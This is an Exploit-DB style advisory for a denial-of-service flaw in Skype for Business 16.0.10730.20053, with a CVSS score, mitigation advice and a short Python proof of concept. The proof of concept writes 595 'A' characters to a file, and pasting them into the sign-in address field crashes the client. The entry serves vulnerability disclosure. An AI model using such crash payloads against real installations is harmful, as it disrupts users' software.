Vendor: Skype for Business
By: Samuel Cruz
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Skype for Business
Affected Version From: 16.0.10730.20053
Affected Version To: 16.0.10730.20053
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:skype_for_business
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64
Year: 2018

Skype Empresarial Office 365 16.0.10730.20053 – ‘Dirección de inicio de sesión’ Denial of Service (PoC)

A denial-of-service vulnerability exists in Skype Empresarial Office 365 16.0.10730.20053 when a maliciously crafted value is entered in the 'Dirección de inicio de sesión' (sign-in address) field. An attacker can exploit this vulnerability to cause a denial-of-service condition. To trigger it, a Python script generates the crafted value and writes it to a text file, and the file's contents are copied to the clipboard. The clipboard is then pasted into the 'Dirección de inicio de sesión' field and a login is attempted. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Skype Empresarial Office 365.

Exploit-DB raw data:

# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
# Discovery by: Samuel Cruz
# Discovery Date: 2018-08-29
# Vendor Homepage: https://www.skype.com/es/business/
# Tested Version: 16.0.10730.20053
# Tested on OS: Windows 10 Pro x64 es/home/

# Steps to produce the crash
# 1.- Run the Python code: python SkypeforBusiness_16.0.10730.20053.py
# 2.- Open SkypeforBusiness.txt and copy its contents to the clipboard
# 3.- Open Skype for Business
# 4.- Paste the clipboard into "Dirección de inicio de sesión" (sign-in address)
# 5.- Sign in ("Iniciar sesión")
# 6.- Crashed

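# Payload: 595 "A" characters (0x41)
buffer = "\x41" * 595

# Write the payload to a text file so it can be copied to the clipboard
with open("SkypeforBusiness.txt", "w") as f:
    f.write(buffer)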